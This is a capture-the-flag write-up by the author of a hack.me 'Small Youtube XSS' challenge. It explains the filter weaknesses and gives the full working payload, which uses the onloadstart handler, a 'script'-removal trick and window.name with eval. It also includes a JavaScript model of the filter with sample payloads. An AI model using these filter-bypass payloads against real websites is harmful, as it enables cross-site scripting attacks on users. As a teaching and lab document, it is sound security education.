Hi,
On June 10, 2016 I published an XSS challenge on the hack.me platform that I called Small Youtube XSS. If you are here just for the solution and are not interested in the write-up, here you go: https://jsfiddle.net/n8dsb1w9/
Here were the rules and hints
Description
Hi, in this XSS challenge you need to use many tricks to make the vector work! It is not so hard and not so easy.
Rules
- No user interaction allowed.
- Use only modern browsers (IE11, FF49, etc.).
- We need to see an alert box with the domain name.
Hints
- Use (?xss=) to inject.
- Try to find missing or weak *things* in the HTTP headers and the HTML source (what else!?).
- Have you ever been told that you are too short to join the basketball team? Now you are too long to XSS this :p
- Watch the video for motivation (https://www.youtube.com/watch?v=hzBCI13rJmA).
If you solve it please contact me (a.hussam[at]isecur1ty.org). Last but not least, enjoy!
--------------------------------------------------------------------------
The challenge has been running for 4 months so far; it has been started more than 700 times and has only 2 solvers. So here is the solution.
Solution
I deleted the source code a long time ago, so I will try to reconstruct what I wrote. I built this challenge on a multi-step filter that applies its checks in series, one after another:
- First it replaces words like eval, setInterval and setTimeout with (xss-event).
- Second it removes the word script (the key to the solution).
- Third it replaces event handler attributes with (xss-event) (except 2 of them).
- htmlentities() is enabled on the xss parameter, so less-than, greater-than and double quotes are useless.
<video width="450" height="400" controls name=injection_here>
  <source src="http://www.google.com/test.mp4" type="video/mp4">
  Your browser does not support the video tag.
</video>
Our injection point is inside the video tag, so let's look at the event handlers available on the video tag (HTML5 Video Events and API).
You will find that all of them have been filtered, but two of them aren't: onloadstart and onratechange.
The word domain is filtered too, so we will use the script-removal trick: because the word script is stripped after the other replacements have run, a payload such as alert(doscriptmain) comes out of the filter as alert(domain).
$_GET['xss'] = substr( $_GET['xss'], 0, 26) ;
Plot twist
(https://en.wikipedia.org/wiki/Plot_twist)
We need another way to alert document.domain, since the regular payload is too long. We can use eval(): eval will run our string as JS code, but where can we put that string? We can pass it in window.name :)
eval is filtered too, but we can use the script trick again, so it becomes evscriptal(name).
So all in one it will be
<a href="http://s25504-102604-rmx.tarentum.hack.me/myvideo.php?xss=''onloadstart=evscriptal(name)" target="javascript:alert(domain);">click me</a>
The target attribute names the browsing context the link opens in, so the new window's window.name becomes javascript:alert(domain); (valid JS, since javascript: is just a label) and eval(name) runs it. Note that ''onloadstart=evscriptal(name) is itself 30 characters long, so the real cut-off must have been a little larger than the 26 reconstructed above.
And here we are
There are several ways to give a window a name, such as window.open() or the name attribute of an iframe. I allowed the page to be framed, but I added frame busting to the page, which can be bypassed easily.
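To make the bypass reasoning checkable, here is a JavaScript model of the serial filter described above (an added example, not the challenge's original PHP). The exact patterns, the replacement order, the 26-character limit and the handling of the word domain are assumptions reconstructed from the write-up; the payloads are constructed for comparison.

```javascript
// Added example, not the original challenge code: a model of the serial
// filter from the write-up. Patterns, order and the treatment of "domain"
// are assumptions reconstructed from the text.

const ALLOWED_HANDLERS = new Set(["onloadstart", "onratechange"]); // the two the filter missed
const MAX_LEN = 26; // assumed, from the reconstructed substr() above

// PHP htmlentities() with its default flags: encodes & " < > and leaves ' alone
function htmlentities(s) {
  return s
    .replace(/&/g, "&amp;")
    .replace(/"/g, "&quot;")
    .replace(/</g, "&lt;")
    .replace(/>/g, "&gt;");
}

function filterXss(input) {
  // Step 1: dangerous functions (and, assumed, the word "domain") become xss-event
  let s = input.replace(/eval|setInterval|setTimeout|domain/gi, "xss-event");
  // Step 2: the word "script" is deleted. Running this AFTER step 1 is the bug:
  // "evscriptal" passes step 1 untouched and becomes "eval" here.
  s = s.replace(/script/gi, "");
  // Step 3: every on* handler becomes xss-event, except the two that were forgotten
  s = s.replace(/\bon\w+/gi, (h) =>
    ALLOWED_HANDLERS.has(h.toLowerCase()) ? h : "xss-event"
  );
  // Step 4: htmlentities on the parameter kills < > and "
  return htmlentities(s);
}

// Where the filtered parameter lands in the (reconstructed) video tag
function renderVideoTag(xss) {
  return `<video width="450" height="400" controls name=${filterXss(xss)}>`;
}

// The window.name trick only works if the name string is itself valid JS.
// "javascript:alert(domain);" parses because "javascript:" is a label.
function parsesAsJs(src) {
  try {
    new Function(src);
    return true;
  } catch (e) {
    return false;
  }
}

// Constructed payloads for comparison
const PAYLOADS = {
  naive: "''onloadstart=alert(domain)",
  scriptTrick: "''onloadstart=alert(doscriptmain)",
  final: "''onloadstart=evscriptal(name)",
};

for (const [label, p] of Object.entries(PAYLOADS)) {
  const fits = p.length <= MAX_LEN ? "fits" : "too long for";
  console.log(`${label.padEnd(12)} ${p.length} chars (${fits} ${MAX_LEN}) -> ${renderVideoTag(p)}`);
}
console.log("window.name is valid JS:", parsesAsJs("javascript:alert(domain);"));
```

Running it shows the naive payload losing the word domain, the script trick restoring it, and the final payload coming out as eval(name); it also shows that even the final 30-character payload exceeds the reconstructed 26-character limit, which is why that number should be read as approximate.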
Solvers
- Adam Simuntis (adam.simuntis[at]secforce.com), with a nice and expected solution
- Lucas Philippe (via a bug in my code, which is now fixed)
I hope you enjoyed the write-up and the challenge; see you soon with another one.
If you want to contact me, reach me on my Twitter account @Abdulahhusam.